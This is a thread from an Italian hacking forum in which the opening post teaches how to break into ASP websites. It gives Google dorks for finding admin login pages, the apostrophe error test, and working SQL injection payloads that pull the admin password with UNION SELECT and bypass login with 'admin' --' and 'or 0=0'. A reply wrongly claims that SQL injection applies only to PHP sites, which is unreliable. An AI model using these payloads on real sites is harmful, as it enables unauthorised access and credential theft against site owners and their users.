The First Hacking

Reply
-- ASP injection-- hackerare sito in .asp
view post Posted on 29/4/2008, 21:23Quote

Advanced Member

Group: Administrator
Posts: 93
Location: Dall'aldilą


Status: Offline: ultima azione eseguita il 3/9/2009, 23:45


Hackerare un sito in ASP

Per prima cosa su google dovete usare il google hacking per trovare i siti provate {allinurl:admin.asp} oppure {inurl:admin.asp}.
Cmq queste sono solo delle ipotesi...dovete essere crativi...

Come hackerare un sito fatto in .asp
Prima passo portiamoci in una pagina che preveda un
login utente, poi dove si inserisce l' userID bisogna inserire
' (l'apostrofo) ed inviare,
non bisogna inserire alcun tipo di password.
Se tutto č andato a buon fine, dovrebbe apparire un messagio del tipo:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query
expression 'ID=''' AND PASSWORD='''.
/scripts/login.asp, line 30
in caso contrario ci apparirą un messagio che ci informa che userID o la
password sono errati ( in questi casi molto probabilmete non sono possibili
azioni maliziose).
Ora tornando alla nostra applicazione modificabile iniziamo a ricercare
informazioni come lo scoprire se esiste o meno un utente admin andando ad
inserire nella zona dell' userID il seguente comando:
' union select min(UserID),1,1,1 from members where
UserID > 'a'--
oppure possiamo tentare di trovare addirittura la
password dell' admin inserendo sempre nel campo dell' userID il comando:
' union select Password,1,1,1 from members where
UserID = 'admin'--
di questi comandi simili ce ne sono parecchi come ad esempio:
admin' --
che ci permette di validarci come admin oppure un' altro comando potrebbe
essere:
' or 0=0 --sp_password
che ci permetterą il login come il primo utente presente nella lista.

Grazie, vi saluto ciaoooo.. :)

image
image
image
image
image
image
image
image
image
image

image
image
image
image

 
P_MSG P_EMAIL P_MSN Top
view post Posted on 25/6/2008, 10:59Quote


Group: Member
Posts: 3796
Location: /=\ VeRoNa AlCoOlIcA /=\ Ę( SaMbOoOoOo)...Ę


Status: Offline: ultima azione eseguita il 29/12/2009, 14:19


guarda ke qst č una ASP-injection nn una SQL-injection

le sql sono x siti in php le asp sono x siti in asp

in poche parole le sql sono ignezioni di codice malizioso ke ci da la pass criptata invece le asp sono dei bypass dell'admin inserendo le variabili 'or' ecc

LOBO
mi hanno rotto il cazzo le firme lunghe
lobuono92@hotmail.it <|--add me
 
P_MSG P_EMAIL P_MSN Top
view post Posted on 12/6/2009, 15:58Quote
Avatar

Advanced Member

Group: Member
Posts: 283


Status: Offline: ultima azione eseguita il 27/12/2009, 19:12


Malizioso o malevolo ? lol



In media stat virtus




 
P_MSG P_EMAIL P_MSN Top
2 replies since 29/4/2008, 21:23
 
Reply

load
Fast reply

 
 
 

Enable emoticons
Clickable Smilies
Show All


Nickname:      Email: